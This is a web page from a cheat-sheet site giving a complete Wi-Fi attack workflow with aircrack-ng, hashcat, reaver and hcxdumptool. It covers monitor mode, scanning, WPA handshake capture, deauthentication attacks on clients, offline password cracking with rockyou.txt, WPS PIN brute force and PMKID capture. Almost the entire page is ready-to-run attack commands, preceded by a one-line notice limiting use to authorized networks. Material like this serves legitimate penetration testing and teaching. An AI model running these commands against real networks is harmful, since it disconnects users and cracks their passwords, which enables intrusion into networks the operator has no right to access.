CyberCheatsheets

Wi-Fi Hacking Cheat Sheet

Wireless attack workflow: monitor mode, recon, WPA/WPA2 handshake capture, deauth, and offline cracking on authorized networks.

Wirelessaircrack-nghandshakewifiwirelesswpa2Updated 2026-06-17

Overview

Wi-Fi attacks follow a fixed sequence: put your card in monitor mode, scan for targets, capture a WPA/WPA2 4-way handshake (optionally forcing it with a deauth), then crack it offline. This sheet uses the aircrack-ng suite plus hashcat. You need a wireless adapter that supports monitor mode and packet injection.

Authorized testing only. Attack only wireless networks you own or have explicit written permission to test. Intercepting or deauthing others' networks is illegal.

Monitor mode

Identify your wireless interface (e.g. wlan0)

iwconfig

Kill processes that interfere with monitor mode

sudo airmon-ng check kill

Enable monitor mode → wlan0mon

sudo airmon-ng start wlan0

Revert to managed mode when done

sudo airmon-ng stop wlan0mon

Recon / scan

List nearby APs and clients (note BSSID + channel)

sudo airodump-ng wlan0mon

Lock to one AP/channel and start capturing

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Capture the WPA handshake

Keep the targeted airodump-ng running (above) and watch for 'WPA handshake' in the top-right

# WPA handshake: AA:BB:CC:DD:EE:FF

Force clients to reconnect with a deauth (captures the handshake faster)

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Deauth a single client only (more targeted/quieter)

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Crack offline

Crack the handshake with aircrack-ng

aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

Convert capture for hashcat

hcxpcapngtool -o hash.hc22000 capture-01.cap

Crack with hashcat (GPU, much faster)

hashcat -m 22000 hash.hc22000 rockyou.txt

WPS & PMKID

List APs with WPS enabled

sudo wash -i wlan0mon

WPS PIN brute force (reaver)

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Capture PMKID (clientless attack)

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

Tips

  • airmon-ng check kill first — NetworkManager will otherwise fight your monitor mode.
  • You only need to capture the 4-way handshake once; a short deauth usually triggers it.
  • Convert to hc22000 and crack with hashcat on a GPU — it's far faster than aircrack-ng.
  • PMKID attacks (hcxdumptool) don't need a connected client — try them when no clients are present.

References

Related cheat sheets